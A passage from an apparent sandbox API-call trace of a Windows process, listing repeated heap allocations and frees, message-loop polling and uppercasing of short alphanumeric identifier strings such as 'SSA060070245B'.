hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.163] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.164] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.164] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.164] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0200.165] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.165] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.166] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.166] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.168] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.169] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.169] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0200.169] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.170] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.171] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.171] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.172] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.173] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.174] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.174] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.175] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.175] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.176] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.181] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0200.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0200.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.181] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.182] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.182] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.182] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: 